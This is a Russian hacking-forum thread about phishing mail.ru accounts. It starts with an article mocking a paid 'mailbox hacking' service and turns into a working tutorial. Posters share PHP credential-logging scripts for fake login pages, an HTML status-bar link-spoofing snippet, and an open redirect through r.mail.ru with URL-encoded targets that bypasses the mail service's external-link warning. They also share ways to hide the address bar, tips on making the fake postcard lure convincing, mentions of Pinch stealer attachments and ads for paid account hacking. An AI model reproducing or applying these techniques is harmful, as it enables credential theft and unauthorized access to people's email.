Очень часто при успешном взломе ящика он наблюдает попытки других сделать тоже самое. В последнее время количество "умников" резко возросло, поэтому он решил показать всё это изнутри. Возьмём недавний случай, с которым ему пришлось столкнуться в одном из ящиков принадлежащих домену mail.ru.

http://img411.imageshack.us/img411/5779/34496257on1.th.gif (http://img411.imageshack.us/my.php?image=34496257on1.gif)

Среди писем сразу обращает на себя внимание письмо от «Администрации Mail.Ru» с темой «Предупреждение». Он начал просматривать все сначала, ибо его интересовала вполне конкретная информация. И вот он дошел до письма от сервиса Открытки@mail.ru.

http://img440.imageshack.us/img440/800/39392793ap2.th.gif (http://img440.imageshack.us/my.php?image=39392793ap2.gif)

Как видно, линк из письма ведёт вовсе не на открытку. Убогость способа просто потрясает. Если честно, затрудняюсь дать статистику успешности взлома этим методом, но лично я бы не повелся.

http://img113.imageshack.us/img113/1353/45657951ip8.th.gif (http://img113.imageshack.us/my.php?image=45657951ip8.gif)

Смотрим на адресную строку и всё понимаем. Второе письмо от «Администрации» даже улыбнуло.

http://img409.imageshack.us/img409/9348/80544097te1.th.gif (http://img409.imageshack.us/my.php?image=80544097te1.gif)

Кстати, если глядя на адрес фейка, предположить что там хитрый скрипт - сильное заблуждение =) Это физический адрес папки на сервере, как говорится, голь на выдумку хитра.

Вот так произошло знакомство с http://mai1.pp.ru/. Имея полный доступ к почтовому ящику, некто заверил, что конкретно данный человек, хозяин ящика, не повелся на уловку. Однако, ещё более рассмешил другой факт. Проглядев мельком фейк-странички, я зашел на индекс сайта, где зашедших информируют, что данный сервис занимается взломом ящиков за деньги (!). Вот несколько цитат:
• У нас самый гарантированный, эффективный, анонимный и быстрый взлом.
• Берегитесь, сейчас открылась целая куча различных жалких подобий нашего сайта, берегитесь, они простые кидалы, мы уже работаем в этом бизнесе более двух лет.
А из фразы «взлом почтовых ящиков на mail.ru, rambler.ru, yandex.ru и других почтовых системах» я делаю вывод, что ребята просто гроза почтовиков, гранды и монcтры хака. Вот только у кого-то это получилось, а у них нет, какже так?? За работу товарищи просят 35 wmz, при этом вообще интересно обратить внимание на «прайс» http://mai1.pp.ru/service.html. Например, домен inbox.ru не имеет отношения к mail.ru, да и вообще его не существует, а взломать запароленный архив вам обойдется всего лишь 10-20 wmz. Интересно, как они планируют работать по корпоративным ящикам??

Что мешает _любому_ человеку повторить теже самые действия?? Осматривая фейк, подметил, что бравые кулхацкеры поленились даже убрать счетчики со странички, это уже непрофессионализм. Сам факт того, что человека надо ещё «уговорить» перейти на заветный фейк, отношу к той же категории. Хотя, если уж так важно чтобы человек именно осознанно перешел на фейк, то я бы не поленился замаскировать кривой линк. Сперва из письма, примерно вот так:

<a href="http://forum.antichat.ru/"
onMouseOver="window.status= 'http://microsoft.com/'; return true;"
onMouseOut="window.status='';">http://microsoft.com/</a>

Исправно работает в IE, что уже не плохо. Можете попробовать, сильно удивитесь, полезная фича. Только вот беда, чтобы сделать это уже знания нужны. Во-первых, сам код весьма не тривиален, а во-вторых, существуют злостные фильтры которые обязательно обрежут лишнее. Чтобы осуществить задуманное потребуется XSS-уязвимость, а эти парни видимо даже не знаю что это такое, делаем выводы. Потом в самом фейке. Оставлять вот так адресную строку, совсем не дело. Как вариант, делать её очень длинной, тогда некоторые браузеры, например Опера, показывают только конец линка, в то время как домен остается далеко за экраном. Метод кривой, но хотя бы так =)

Более продвинутые товарищи идут дальше. Переход на фейк принимает скрипт, который определяет точную версию браузера. После этого окно разворачивается на весь экран или просто делается всплывающее окно, главное скрыть родные панели браузера, включая адресную строку, а в контент странички выводят _РИСУНКИ_ панелей и рисунок адресной строки с вроде как правильным значением. В край, хотя бы просто текстовое поле с подмененным адресом. Это для тех, кто легких путей не ищет, создание неоправданно трудоёмко, а если жертва использует свои скины или меняет значение User-agent, то вообще безжалостно палит задумку. Пожалуй, лучше просто скрыть адресную строку.

Для самых любопытных могу сказать, что вроде как есть способ, позволяющий именно _менять_ адресную строку, оставаясь в совсем другом месте. И добиваются этого при помощи Flash-технологий и ActionScript.

Вот теперь давайте посмотрим, за что же эти ребята просят деньги?? Фактически, ни за что. Я не вижу здесь абсолютно ничего не доступного простому смертному, например, моей девушке =) Нет применения каких-то особых методов или технологий, требующих определенных знаний или умений. Поэтому, призываю быть бдительными прибегая к услугам подобных «контор». Такое письмо сразу выдаст намерения отправителя, а определиться с заказчиком/целью не всегда трудно. Вспомним рекламу на главной сайта «самый гарантированный метод», «эффективный», «быстрый взлом». Это всё иначе как пафос не называется. Теперь вы знаете, как работают бравые хакеры с сайта http://mai1.pp.ru/. Конечно, кидалами я их назвать не могу, но халтурщики 100%.

К счастью, на этом предложения подобного рода услуг не заканчиваются. Есть действительно спецы и их не так мало, они не нуждаются в создании отдельного сайта для афиширования своей деятельности, лучше всего _искать самим_ по рекомендациям друзей/знакомых, а _не оставлять просьбы_ на всевозможных форумах, досках.

Однако, не каждый возьмётся за заказ от первого встречного. Кто-то просто боится огласки своей деятельности, ведь каждый удачный взлом это нарушение закона. Но чаще всего, человек отказывает из-за незнания того с кем связывается, в последнее время участились случаи, когда исполнителя просто кидают!! Некто очень умный и думающий что он умнее всех, не исключаю что контора http://mai1.pp.ru/ относится к таким же, регистрирует ящик вида veronika_2002@mail.ru и сразу же заказывает его, после чего просто внимательно наблюдает, что же происходит с ящиком. В любом случае, после получения результата заказчик просто исчезнет, зачастую с информацией о том, что именно вы делаете и как. Кто-то таким образом оценивает силы конкурента, пытается выведать приватные уязвимости… Ещё раз повторю, таких случаев сейчас становится всё больше и больше, поэтому не удивляйтесь если в скором времени проверенный спец повысит стоимость оказания услуг или попросит предоплаты.

В свою очередь, если прочитав это у вас как у заказчика появились какие-то позывы/желания, то спешу предостеречь. Во-первых, воровать методы/технологии это низко и нечестно. Если вы признаёте необходимость того, что вам нужен чей-то ящик, имейте достоинство признать необходимость обратиться к спецу и иметь уважение к нему. Этот человек бережет вашу тайну, как может, и рассчитывает, что его усилия будут оценены. Мне доподлинно известны случаи, когда кидал вычисляли и жестоко наказывали в реале, хотя территориально было не близко.

Если так нужна уязвимость или методика, то и ищите человека, который продаст именно её, будьте готовы честно отдать за неё затребованное.

Цена это тема отдельного разговора и каждый в праве сам её устанавливать, однако есть неписанные правила. В данном примере, халтурщики просили 35 wmz за честно проделанную работу. Если просят меньше, то к вам или хорошо относятся (возможно друг, знакомый или очень давний постоянный клиент, для которого действуют старые «тарифы»), либо вы имеете дело с новичком, который ещё не всё понял и осознал. Ну и конечно, вариант, что, вас, кинувшегося на дешевизну, в итоге кинут.

Достаточно широкую огласку получил случай, который произошел на http://forum.xakep.ru/ пару месяцев назад, когда кул-хацкер входил в контакт с человеком, чей ящик заказывали, в обмен на скриншоты папки входящих писем вводил жертву в курс дела (кто заказывал и когда), впоследствии предоставлял скриншоты заказчику и после оплаты исчезал для обеих сторон. С заказчика брал 25 wmz. После того как обман раскрылся, он просто сменил ник и сейчас продолжает свою деятельность на другом форуме (не на forum.antichat.ru, у нас с этим тьфу тьфу тьфу), однако точно известно его местоположение и люди, чью деятельность он ставит под угрозу уже его предупредили. Обойдемся без ников.

Также частенько встречаю совсем глупые предложения о взломе за 5 wmz на любых почтовых серверах… No comments.

Поэтому, сперва важно самому для себя оценить важность той информации, которую вы хотите получить и самому предложить цену. В любом случае, за ящик, взлом которого сопровожден большим риском/ответственностью (например, если на ящике хранится финансовая информация фирмы), будьте готовы выложить больше обычного, это закономерно. Не гонитесь за дешевизной, гонитесь за качеством работы, ориентируясь на отзывы других людей, это самая правильная политика.

Надеюсь, эта статья-обзор более или менее сформировала для вас правила игры в этом деле и немного приоткрыла тайну над «самым гарантированным, эффективным, анонимным и быстрым» методом взлома почтового ящика.

PS. В последнее время у гринов появилась устойчивая тенденция говорить о себе во 2-3 лице =)

или просто делается всплывающее окно, главное скрыть родные панели браузера
Это как??? Просто окно? Дык видно его и закроют.

регистрирует ящик вида veronika_2002@mail.ru и сразу же заказывает его, после чего просто внимательно наблюдает
Абсолютно верно. Поэтому приходиться заказчиков искать самому (а не кто стукается в личку), и работать со старыми заказчиками. Отсюда и цены не 5 уе.

Хм....очень понравилось...я так разоблачил как то одного кидалу :) он ломал,брал деньги ,и не давал пасс....

Честно говоря способ тут убог .... и сервисы дрянные за которые слишком много просят...Все мои мыльники стоят по 100 уе,но я ворую только забугорные и платные.

Ps пожалйста не надо пытаться меня разоблачить =)

Как видно, линк из письма ведёт вовсе не на открытку. Убогость способа просто потрясает. Если честно, затрудняюсь дать статистику успешности взлома этим методом, но лично я бы не повелся.
А как тебе такой шедевр:
"Зджравсвуйте! Вышли новые обновления для почтового ящика mail.ru. В целях безопасности вашего ящика, настоятельно рекомендуем их установить."
Отправитель: sacurity_mail_ru@mail.ru
В письме аттач с пинчем.
Повелось ТРИ человека из 10ти.
Хотя казалось бы - кол-во ляпов и бессмыслицы в таком письме просто неизмеримы. Опечатка в первом же слове, совершенно корявый ящик, предложение скачать апдейт, когда люди пользуются браузером :\

Так что даже самые бредовые методы во многих случаях работают против самых бредовых ламеров, которые ежедневно впервые подключаются к интернету. Кстати один из этих 3оих на тот момент имел стаж в интернете - 2 года. Но он уникум. До сих пор использует пароль исключительно 123456 и 654321.

Так что даже самые бредовые методы во многих случаях работают против самых бредовых ламеров, которые ежедневно впервые подключаются к интернету.
Их ящики никому не нужны, чтобы их заказывать

Их ящики никому не нужны, чтобы их заказывать
Не согласен. Заказывают ведь. Причем заказывают такие же "бредовые ламеры" с совершенно неизвестно целью - типа "насолить другу", "он написал про меня плохое в ЖЖ" и "хочу проверить не изменяет ли мне девушка". Ведь были всегда такие мотивы, и будут, имхо.

upd:
Прчем заказывают у таких же лолегов пример которых в первом посте. И они такими же бредовыми методами их ломают ))
Помоему это весьма даже естесственно. Есть люди которые занимаются профессиональным взломом за хорошие деньги, а есть лолеги которые ломают на заказ всякую мелочь. Пищевая цепь типа :\

"насолить другу", "он написал про меня плохое в ЖЖ" и "хочу проверить не изменяет ли мне девушка".
Блин просят такие, сразу лесом посылаю, один правда достал.... скинул ему ссылку на пинч, долго меня благодарил, незнаю правда освоил или нет...

ЗЫ Развод довольно таки грамотный, только если все делать по уму...
Авторы представленного сайта вообще поражают - амбиций #опой жуй а толку как мне кажется NULL.

Блин просят такие, сразу лесом посылаю
так не обязательно они будут это говорить и озвучивать. Потом тех кто ломает за деньги в большинстве своем причины не интересуют. Я имею ввиду что это реальный мотивации которые заставляют людей платить за взлом совершенно не интересных мыльников....

забавная статья читал с интересом в некоторых местах с умилением =)))

Кстати, незабвенный http://mai1.pp.ru/ уже сутки как лежит =))) Интересно, абуза от агентов мейла пришла, сами поняли что больше им нечего не светит или из наших кто прошелся?? =)

На seclab.ru сегодня очень интересная тема была про подмену адрессной строки, Elekt показал, там на основные браузеры есть темы с живыми примерами.

Вообще, если внимательно изучить маил_ру - то у него существует редирект. Дополнив его своей ссылкой - будет редиректить на ваш фейк-сайт.
Т.е. в начале адреса будет светиться mail.ru, а дальше уже хвост с вашим сайтом.
...
По статье на секлабе - пример пока видел, но еще практически не тестил (получиться или нет). А так - эх, жалко что на паблик =(

Кстати, незабвенный http://mai1.pp.ru/ уже сутки как лежит =))) Интересно, абуза от агентов мейла пришла, сами поняли что больше им нечего не светит или из наших кто прошелся?? =)

тока что лазил, всё ок пашет

хм, дронга разоблочатель наш, читал с удовольствием)))) вот до чего докатились угонщики

>> в последнее время участились случаи, когда исполнителя просто кидают!! Некто очень умный и думающий что он умнее всех, не исключаю что контора http://mai1.pp.ru/ относится к таким же, регистрирует ящик вида veronika_2002@mail.ru и сразу же заказывает его, после чего просто внимательно наблюдает, что же происходит с ящиком.

ну это не стоит называть кидаловом, это прием СИ..

>> Во-первых, воровать методы/технологии это низко и нечестно.

ага, а воровать чужие ящики для кого-то за деньги это высоко и честно??

ну это не стоит называть кидаловом, это прием СИ..
так же как и продавать чужие программы?)
ага, а воровать чужие ящики для кого-то за деньги это высоко и честно??
тут понимаешь... как кража у своих. все таки одним делом люди занимаются, зачем так делать?

>> так же как и продавать чужие программы?)

вот, ты сразу переводишь мотивацию того, что Dronga назвал кидаловом, на деньги, а ты не думал, что кому-то просто интересно узнать существующие способы кражи ящиков? (например, чтоб обезопасить себя самого от этого) не всех же одни тока деньги интересуют..

censored! Верно и редирект там даже в нескольких местах =)

Пускай те кого интересуют способы ищут/узнают своей головой, в край, если найдут людей, то своим кошельком. И по-моему, на античате в той или иной форме вспомнили обо всех методах. Спец из статьи не ставил цели разоблачить, он просто делал свою работу, просто заказали не только у него... Это относительно честная борьба.

А вот когда кто-то доводит и оттачивает свои методы до полного автоматизма и совершенства, месяцами, сидит пишет, пробует, постоянно что-то подправляет, слидит за каждым изменением... а кто-то не имея такого опыта/знаний просто ворует это в считанные минуты. При этом изначально заказывает, просит доказательства.. А потом говорит что сейчас только за картой сбегает и исчезает. Логи есть очень интересные, когда вчерашний заказчик просто открыто издевается.

А сайт http://mai1.pp.ru/ и вправду возобновил свою работу, правда смысла я не понимаю =)
+ там появилась новость от 20.02.2007 =)))) Линк что-ли на тему у них в гостевой оставить... ;)

На pp.ru вообще реальные сайты паркуются, например http://astarta.pp.ru/ Тоже экземпляр из этой серии =) Все записываемся на услугу снятия негатива =)

Пускай те кого интересуют способы ищут/узнают своей головой, в край, если найдут людей, то своим кошельком. И по-моему, на античате в той или иной форме вспомнили обо всех методах. Спец из статьи не ставил цели разоблачить, он просто делал свою работу, просто заказали не только у него... Это относительно честная борьба.

лол.. что-то, я не понял что тут честного..
"спец из статьи" попросту подсмотрел чужой способ воровать ящики, увидел, что он ламерский и решил выставить на посмешище своих конкурентов.. при этом в самой статье он пишет, что узнавать чужой способ - это кедалово (хотя сам по сути это и делает)..

конечно, заказывать у человека ящик лично, а потом еще обосрать по асику - это засранство, и за это грех по ***лу не дать (если есть возможность),
но когда выкладуешь на форуме объяву с предложением сломать ящик (а его наврядли кто сломает - потому и платить не за что) и наблюдаешь за действиями хакиров - то это СИ..

поэтому очень правильно, в принципе делают люди, которые имея хороший способ тырить ящики аккуратно отбирают заказчиков, не кидаясь на что попало..

А сайт http://mai1.pp.ru/ и вправду возобновил свою работу


Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/mai1pp/public_html/index.php on line 6


Это на главной красуется =)

Digimortal

То что делают они, это реальное ламерство и халтура. Ты просто не знаешь как они подосрали и кому. Добавляем сюда всю их крутизну и то что только они не кидают, а остальные обязательно кинут. Так что поаккуратнее в высказываниях.
Parse error: syntax error, unexpected '>' in /home/mai1pp/public_html/index.php on line 8
Мне почему-то кажется скоро на их главной будет висеть дефейс =)

>> То что делают они, это реальное ламерство и халтура.

согласен

>> Ты просто не знаешь как они подосрали и кому.

да мне это и не надо знать, я высказал свое мнение об одной маленькой вещи в статье с которой в общем то не согласен, а их я вообще не касался..

>> Добавляем сюда всю их крутизну и то что только они не кидают, а остальные обязательно кинут.

опять же, мне на них пофиг.. таких "контор" полно и каждый пишет, что только он один единственный не кидает и выполняет работу со 100% гарантией.. лолеги ))..

>> Так что поаккуратнее в высказываниях.

а разве я неаккуратен в них?

Dronga- главный разоблачитель Античата =)
(А если серьозно то имхо теряються нити темы)\тему почитстил, все разборки в ICQ!!!

Dronga- главный разоблачитель Античата =)
(а если серьозно, то нити темы имхо теряються)
Твоё право почистить тему, я от темы не ухожу, просто люди не могут честно постучать мне в асю и всё уладить. Так что получается пиар Античата =) Я не разоблачитель, просто так получается.

Для поддержки темы расскажу про метод о котором уже вспомнил censored!. Для того что бы спрятать линк из письма вовсе не обязательно знать какие-то хитро навороченные скрипты, использовать XSS чтобы суметь их вставить в тело письма... Есть более тривиальный метод =) Это использование редиректа непосредственно от служб mail.ru. Например, внешне, очень сипатичный линк http://r.mail.ru/cln2863/www.forum.antichat.ru/ Приведёт вовсе не на mail.ru, как может ожидать потенциальная жертва =)

Но это пол дела, пока что всё достаточно прозрачно. Чтобы окончательно ввести жертву в заблуждение кодируем www.forum.antichat.ru примерно в такой вид:

%77%77%77%2E%66%6F%72%75%6D%2E%61%6E%74%69%63%68%6 1%74%2E%72%75

И получаем:
http://r.mail.ru/cln2863/ %77%77%77%2E%66%6F% 72%75%6D%2E%61%6E%74%69%63%68%61%74%2E%72%75/Вот так гораздо лучше =) *всё в одну линию, пробелы убрать.

Одним секретом меньше =)
(c)Dronga#Antichat.ru

<a href="http://forum.antichat.ru/"
onMouseOver="window.status= 'http://microsoft.com/'; return true;"
onMouseOut="window.status='';">http://microsoft.com/</a>
А такой код фильтры мэйловские пропустят вообще?

Совневаюсь...
з/ы спс Dronga правда и не секрет как бы=)

Совневаюсь...
з/ы спс Dronga правда и не секрет как бы=)
А чтож ты им не поделился??
А такой код фильтры мэйловские пропустят вообще?
ну если очень хорошо подумать как это правильно сделать, то обязательно пропустят. Если пытаться отправить как есть, то конечно нет.

А чтож ты им не поделился??

ну если очень хорошо подумать как это правильно сделать, то обязательно пропустят. Если пытаться отправить как есть, то конечно нет.
Все что я знаю и не видел подобного в паблике,я в паблик не выкладываю....

Рано или поздно это ктонибудь да выложил... да и основания есть! так бы не крысил...
http://slil.ru/24027168 - файлы сайта...

За паролем в личку...

а мне недавно пришло письмо с просьбой о восстановлении пароля..мол bla-bla-bla мы проипали ваш пароль. вышлите))) признавайтесь, кто такому учил?)))

Слушайте, у меня вопрос стоит так, надо сделать аналог этой странице на беспалтном хостинге (джино, 122мб, ту1)
Страницу то я сделаю, а вот что мне надо что бы пароль сохранился и скоприровался в файлик....

для аналога страницы сорцы не дам. ибо нефиг!

Слушайте, у меня вопрос стоит так, надо сделать аналог этой странице на беспалтном хостинге (джино, 122мб, ту1)
Страницу то я сделаю, а вот что мне надо что бы пароль сохранился и скоприровался в файлик....

Вот самый примитивный скрипт, если хоть чуть-чуть в php шаришь, то под себя его легко заточишь =)...

//--удалено--//


файлик 1.txt не забудь в папку кинуть...

...и название переменных согласуй с переменными с формы...

Страницу сделал,
в
fputs($file, $HTTP_POST_VARS["Login"]." ".$HTTP_POST_VARS["Password"]."\n")
Все подкариткировал (как видешь)
Но в 1.тхт всеравно не сохраняется ничего :/
Пробовал вместо логин, писать login_from
но не прокатило, права на тхт файл поставил 777
Что я ни так сделал?

Sandjuro
права вроде на папку на фтп ставятся а не на файл
может ты через GET данные передаешь?
исправь HTTP_POST_VARS на _REQUEST

Sandjuro
Я уже спрашивал об этом, когда баловался подобными вещами. В разделе "Для веб-мастера" есть.
Вот скрипт. Не забудь в папке со скриптом создать log.php и поставить права доступа нужные ;)
<?php
$username=$_GET['username'];
if (isset($username))
{
$log_path="./log.php";
$log_string=$username." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>

Finder, Спасибо! тока подскажи, где саму страницу вставлять? после закрытия скрипа? (после "?>")
Если вставляю после тега, то лог.пхп пуст, мне кажется что вместо юзернейм в $log_string=$username." ";
надо поставить login , я прав?

Ну, я этот скрипт в конец своей странички запихнул.
Собсно, а какая разница, где он будет? :)

$log_string=$username." ";
тут username - это имя текстового поля, в которое вводятся данные.
зы: для log.php права у меня выставлены -rw-r--r--

2 Sandjuro
Внимательно посмотри форму и скрипт, может поймешь почему не получалось...

Iceangel_
Спасибо! я пхп не учил потому как мог так и мутил! а твой фейк заработал! щя саму хтмл страницу дороботаю маиловскую и сделаю чтобы перекидовыло на открытку :)

2 Sandjuro
Если что, стучись в асю[ 222284836 ], помогу...

Как на зло сейчас не имею доступ в аску (но сегодня должен быть там)
У меня вот такой вопрос появился
в echo("Системная ошибка");
если я вставляю ссылку или скрипт но он не работает, я хотел туда подельную страницу с открыткой вставить :)
это возможно?

Как на зло сейчас не имею доступ в аску (но сегодня должен быть там)
У меня вот такой вопрос появился
в echo("Системная ошибка");
если я вставляю ссылку или скрипт но он не работает, я хотел туда подельную страницу с открыткой вставить :)
это возможно?

echo("Системная ошибка");
допустим замени на Header("Location: http://mail.ru");
mail.ru -- куда будет перекидывать пользователя.

Взлом почты- mail, yandex, rambler
без предоплаты
любые доказательства.
наш сайт www.roobpass.ru

Профессиональный взлом почты (http://roobpass.ru)

http://v-alksnis2.livejournal.com/4283.html

Чтобы окончательно ввести жертву в заблуждение кодируем www.forum.antichat.ru примерно в такой вид:

%77%77%77%2E%66%6F%72%75%6D%2E%61%6E%74%69%63%68%6 1%74%2E%72%75

И получаем:
Вот так гораздо лучше =) *всё в одну линию, пробелы убрать.

(c)Dronga#Antichat.ru
Не подскажете как закодировали?
И ещё как в майл.ру http://img440.imageshack.us/my.php?image=39392793ap2.gif вставляете картинки в текст?
Вот самый примитивный скрипт, если хоть чуть-чуть в php шаришь, то под себя его легко заточишь =)...

//--удалено--//


файлик 1.txt не забудь в папку кинуть...

...и название переменных согласуй с переменными с формы...
Кинь пожалуйста в личку то, что удалено, если нетрудно.

Закодировано при помощи charackter encoding calculator. Это урл значение.
Ресурс с калькулятором здесь, в самом низу http://ha.ckers.org/xss.html

Или просто скачать старый добрый InetCrack от Algola http://old.antichat.ru/inetcrack/ В любом случае, не лишняя программка.

Статья порадовала, СПС!
_не оставлять просьбы_ на всевозможных форумах, досках
ВОТ!!! Вот этот постулат надо повесить в заголовке каждого раздела и разместить у каждого в профиле!!! А то скулёж из серии "хачу мыла, паламайте" уже настигает!!!
лучше всего _искать самим_ по рекомендациям друзей/знакомых
Подпишусь под каждым словом! Dronga, za4ёt :) !

Чет меня удаляют постоянно...ну да ладно по теме тогда скажу...
Sandjuro зачем тебе делать страницу с поддельной открыткой???? лишний раз адрес свой неправильный показывать
сделай тогда уж как у меня с перекидкой на настоящую открытку типа http://cards.mail.ru/card.html?cdu=ef44bfe3f1ead3e0e45fe0d744d2 и пользователь открытку посмотрит, и ничего не заподозрит....а так без открытки пользователи будут по 10 раз пароль вбивать и в итоге что то могут заподозрить.
Небольшое отклонение от темы...но опять и там впихнули мой сайт http://v-alksnis2.livejournal.com/4283.html
не дают мне спокойно жить... :(
Не один такой умный, уже все давно сделано ;)

Способ который использует mai1.pp.ru сейчас не прокатит на mail.ru. При нажатии на ссылку которая ведёт на другой ресурс появляется табличка, "Вы уверены, что хотите покинуть почтовый ящик и перейти на внешний ресурс: http://razvod-lamerov.narod.ru?". Но ссылки вида *.mail.ru/.../.../.../www.razvod-lamerov.narod.ru работают без этих сообщений)))

Подскажите, пожалуйста: Если имя текстового поля, которое надо записать Login, то куда его нужно подставлять в этом скрипте? и будет ли этого скрипта достаточно чтобы данные записались в log.php

<?php
$username=$_GET['username'];
if (isset($username))
{
$log_path="./log.php";
$log_string=$username." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>

xe0n2
<?php
$Login=$_GET['Login'];
if (isset($Login))
{
$log_path="./log.php";
$log_string=$Login." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>

Способ который использует mai1.pp.ru сейчас не прокатит на mail.ru. При нажатии на ссылку которая ведёт на другой ресурс появляется табличка, "Вы уверены, что хотите покинуть почтовый ящик и перейти на внешний ресурс: http://razvod-lamerov.narod.ru?". Но ссылки вида *.mail.ru/.../.../.../www.razvod-lamerov.narod.ru работают без этих сообщений)))

Поясните, пожалуйста, каким образом нужно писать ссылку, чтобы обойти эту табличку мейл.рушную?

со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)

со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)
Потому что кодировка пишется после адреса на каторый перекидывает,
Пиши так http://r.mail.ru/cln2863/www.ya.ru
и отсылай письмо с помощью хтмл, а там я надеюсь ты знаеш как визуально адрес изменить
<a herf=http://r.mail.ru/cln2863/www.ya.ru>http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F </a>
и будет счатя, я так обошел ;)

Кодированные линки не будут работать в Internet Explorer 7.0 , на сайте microsoft-а читал, такую мазу они ввели видимо из соображений безопасности...
так что ребята, облом с URL-кодировой...

http://ha.ckers.org/xss.html

B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу

B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу
А вот там уже нельзя, потому и рег левый бесплатный хост

B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу

А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают :D :D

А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают :D :D
Ни у всех ie :\ а уже что то даже на движке ие отоброжает адрестную строку! и вообще помните что малейшие различии от оригинала могут повергуть в сомнения жертву

Вот самый примитивный скрипт, если хоть чуть-чуть в php шаришь, то под себя его легко заточишь =)...

//--удалено--//


файлик 1.txt не забудь в папку кинуть...

...и название переменных согласуй с переменными с формы...


а мона в Личку получить удалённый скриптик?

Так же, как и интернет...
Лежал где-то в сети кряк интернета - попробуй

Способ который использует mai1.pp.ru сейчас не прокатит на mail.ru. При нажатии на ссылку которая ведёт на другой ресурс появляется табличка, "Вы уверены, что хотите покинуть почтовый ящик и перейти на внешний ресурс: http://razvod-lamerov.narod.ru?". Но ссылки вида *.mail.ru/.../.../.../www.razvod-lamerov.narod.ru работают без этих сообщений)))

Кто нить знает как обойти эту окошку? то что предлагал lmns не катить

Все рботает как говорит lmns, просто заостри внимание на *

Ребята, только не пинайте сильно. Помогите, я все понял как обойти фильтр и с редиректом понял. НО.
Что даст переход юзверя на вашу ссылку???
Что вы юзаете? Пинча со сплоитом??
Если да, то дайте ссылку пожалуйсто для тех кто в танке по сплоитам (озы их использования в паре с троем).
Если не это, то подскажите что вы юзаете...
спасибо. Если чо не так то сорри((

www.mai1auth.pp.ru/cpanel
м?

Ребята, только не пинайте сильно. Помогите, я все понял как обойти фильтр и с редиректом понял. НО.
Что даст переход юзверя на вашу ссылку???
Что вы юзаете? Пинча со сплоитом??

Это уже не тупость, это большая лень. Читай первую страницу темы. Как объяснить понятней чем там, я не знаю.

Что даст переход юзверя на вашу ссылку???
мы логоним домен и юзаем снифер =))) иногда помогает =)))

Инетерсная статейка мейлу.ру большой баг)

Все рботает как говорит lmns, просто заостри внимание на *

уже не работает!

уже не работает!
http://r.mail.ru/clb123456789/antichat.ru

<table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td id="aj_body">
<div id="let_body">

</div></td><td _base_href="http://win.mail.ru/cgi-bin/readmsg"><a href="http://mail.*****.ru/efafcdb8ee742cf3648b659805b073c9.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">c</a></td>
<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="100%">
<font color="#000000" face="Arial" size="2">Здравствуйте, Вам пришла открытка!</font><br>
<font color="#000000" face="Arial" size="2">Чтобы посмотреть открытку, нажмите на ссылку, расположенную ниже, или скопируйте ее в адресную строку браузера.</font><br>

<font face="Arial" size="2"><b><a href="http://mail.*****.ru/efafcdb8ee742cf3648b659805b073c9.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">http://cards.mail.ru/card.html?cd=eccc9a8ec0282af4362c0eca5bcda811</a></b></font><br><br>
<font color="#666666" face="Arial" size="1">Открытка будет дожидаться вас в течение 90 дней.</font>

</td>
</tr>
</tbody></table>
<br>
<hr bgcolor="#D9D9D9" noshade="noshade">

<table _base_href="http://win.mail.ru/cgi-bin/readmsg" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody _base_href="http://win.mail.ru/cgi-bin/readmsg"><tr _base_href="http://win.mail.ru/cgi-bin/readmsg"><td _base_href="http://win.mail.ru/cgi-bin/readmsg">




<font color="#666666" face="Arial" size="1">Открытки к праздникам</font>
<table _base_href="http://win.mail.ru/cgi-bin/readmsg" border="0" width="100%">
<tbody _base_href="http://win.mail.ru/cgi-bin/readmsg"><tr _base_href="http://win.mail.ru/cgi-bin/readmsg" align="center" valign="top">

<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82163&amp;S=&amp;tid=7636" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/98ee7292c19d0dd8bc8b082dbcd88f61.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82163" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">День рождения</a></font></td>


<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82421&amp;S=&amp;tid=7379" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/afe9124378c9df06ec45e59e86899c3c.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82421" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">На каждый день</a></font></td>


